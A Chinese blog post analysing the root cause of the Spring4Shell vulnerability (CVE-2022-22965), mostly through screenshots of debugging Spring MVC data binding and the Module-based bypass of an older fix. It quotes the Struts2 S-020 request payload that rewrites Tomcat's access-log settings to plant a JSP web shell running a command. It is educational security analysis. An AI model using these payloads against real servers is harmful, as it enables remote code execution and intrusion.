浅谈CVE-2022-22965漏洞成因(六)
前言:记录一篇自己入门java安全的故事,捋一下思路,轻量知识 ,重在调试 !.
这篇文章四个部分:
引入篇:整理一下CVE-2022-22965漏洞的来龙去脉
基础篇:回顾Java中一些基础的内容
调试篇:阅读Spring MVC部分源码
分析篇:分析CVE-2010-1622、CVE-2022-22965的漏洞成因
.
分析篇
( 紧接" 浅谈CVE-2022-22965漏洞成因(四)”,复现并分析一下CVE-2022-22965漏洞成因 )
CVE-2022-22965漏洞分析
1、在Struts2框架的S-20的问题中的攻击手法
这里我们仅需要了解一个思路,CVE-2022-22965中的攻击手法与这个相同,其payload如下:
//修改写入文件所在的根目录
http://127.0.0.1:8080/FirstStruts2/login?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
//修改写入文件的名称
http://127.0.0.1:8080/FirstStruts2/login?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
//修改写入文件的后缀名
http://127.0.0.1:8080/FirstStruts2/login?
class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
//修改文件日期格式,用于切换目录
http://127.0.0.1:8080/FirstStruts2/login?
class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=2
//访问shell.jsp将会记录日志
http://127.0.0.1:8080/FirstStruts2/shell.jsp?=<%Runtime.getRuntime().exec("calc");%>看完前面的调试过程,再看这个payload基本上没什么问题,不再过多叙述。
.
带Spring MVC项目的项目部署到Tomcat中(或者Spring Boot可执行jar,内置web服务器),多加个module改下Payload,就能写入个日志文件,且是jsp格式的。
https://www.sec-in.com/img/sin/M00/01/10/wKg0C2KiOmqAfyj9AAFBHDD5o40839.png
简单的改一下,用下面的Payload,访问(无攻击效果),看看Spring MVC版本5中是如何对请求传参作递归解析、获取PropertyDescriptor以及在这个过程中怎么绕过了CVE-2010-1622中Spring官方的修复
http://localhost:8090/SpringMVC5/level/info?class.module.classLoader.URLs=jar:http://localhost:9999/test.jar!/2、调试Spring MVC版本5中请求传参作递归解析
从DataBinder开始
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdI-AcEePAABgUjYN0-U307.png
DataBinder调用AbstractPropertyAccessor的setPropertyValues方法遍历每一个参数并开始对每一个参数进行解析,我们只传了了一个需要递归解析的请求参数,所以,在setPropertyValues里只会进行一轮迭代
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdJuADlnMAADQvMd7yA4540.png
AbstractPropertyAccessor调用AbstractNestablePropertyAccessor的setPropertyValue方法,在这个方法中,有解析形如"var1.var2.var3.var4.var5"这种形式的请求参数
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdKeAdKGvAACUT4kcxdk518.png
解析class的过程如下:
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdLKABijKAABeqD9njjo371.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdLeAG6K6AAB_5QikWdI053.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdMaAQNPYAABeSbNMhVE382.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdMqAQ-4WAABQO9NsoCo055.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdNGAY32sAABEP6IsdrQ385.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdNWACPMpAAB5cz6qpMw087.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdNyAClKHAACLUQoNvHg363.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdOOAKVnzAADU4ibXC94978.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdOqALBceAAB0JtDENSM283.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdO-AfGJQAACf-IEgKxs136.png
解析module的过程如下:
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdPqAfbvCAABmWzHkeWA659.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdP-AFCdDAABX_bMIv5k112.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdQWAZ6IiAABK8Tx5Yks474.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdQuAS2XVAABDjPqme9s021.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdRaALZfqAABDjPqme9s114.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdR-AFRRYAABsSxXdh-w756.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdSOAbNijAACNOgMvtgs205.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdSmAImSMAADjSvj5BjM190.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdS6AMNycAABjP4x2F-A822.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdTSAW9ZEAABv8f4dyEs174.png
https://www.sec-in.com/img/sin/M00/01/13/wKg0C2KjdTiAMFBIAABf4jFvBsc629.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdT2AKdDGAABoQF_RyS0627.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdUOAcip6AAChehjJScY492.png
解析classLoader的过程如下:
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdUyAZebFAABpfzleeq8645.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdVGAF5y0AABsTRASDH0169.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdVaAGP9fAABI_Ouxz04096.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdV-ABlh1AABIfij-Pfs797.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdWSAIy5fAABqaCVf75U854.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdWiAdeQCAAB1ws3h0-k474.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdW6AIHpuAAD7tAuUSLQ185.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdXKAP-53AADMpDf9bQg457.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdXiANBLQAABeakfpcOM629.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdXyAT8a3AAB8_tt33Dc065.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdYGAe-qVAAA8NWVGRIU505.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdYWAZmFAAACnkEzYzy0929.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdYqAe2c2AAC-1jFmy8M289.png
对class.module.classLoader.URLs[]赋值的过程如下:
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdZSAHX3bAABJY0dc5Ws066.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdZmAMnzqAABmJq0rj0Y000.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdZ2AZF7AAABIW26BlVU318.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdaKAJvgTAABP9jncRe4901.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdaaAUCT2AABdrhkTplQ483.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdaqAItbPAABPiKp7zNQ899.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2Kjda6AC0ZiAACnxp9FtLs990.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdbOAUNz5AAC5D2DJE88788.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdbiASLU4AABzQyzDAM4570.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdbyATw2iAADuPBHhjDw314.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdcaAOYY3AABeAzFyZXk022.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdcuALUVrAAA-mMp-ZB0071.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2Kjdc6AE323AACQE3VOBZw756.png
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjddSAJBimAACvJmzjDUM581.png
第一个参数解析完毕!
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjddyAGQkoAABPL4q1N3w299.png
3、绕过原因分析
重点就是这里,本来的拦截规则是当内省的bean是class且获取到的PropertyDescriptor是classLoader时,CachedIntrospectionResults是不能缓存classLoader这个PropertyDescriptor的,但是jdk11中多了个Module的特性,当内省的bean是Module时,CachedIntrospectionResults就能缓存classLoader这个PropertyDescriptor了。
https://www.sec-in.com/img/sin/M00/01/14/wKg0C2KjdfeAU81MAAD7tAuUSLQ966.png
.
.
写在最后:
4月份时就分析了这个漏洞,但由于各种原因,拖到现在才总结出来,中间有许多有趣的东西都遗忘了,再加上临近期末,各种事情凑团,有很多细节的东西都没补充全。
再有就是本文重在通过调试分析整个代码执行的过程,不过多追求如何攻击,payload利用需要根据Spring部署的环境视情况而定,找到可利用链。(PS:自己也不是很懂)
.
推荐阅读:
光闪师傅写的《深入理解Spring MVC源代码》
P牛师傅写的Java安全漫谈
yiran4827师傅的Struts2 S2-020在Tomcat 8下的命令执行分析
https://cloud.tencent.com/developer/article/1035297
Ruilin师傅的SpringMVC框架任意代码执行漏洞
http://rui0.cn/archives/1158
麦兜师傅的Spring 远程命令执行漏洞分析
https://paper.seebug.org/1877/
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]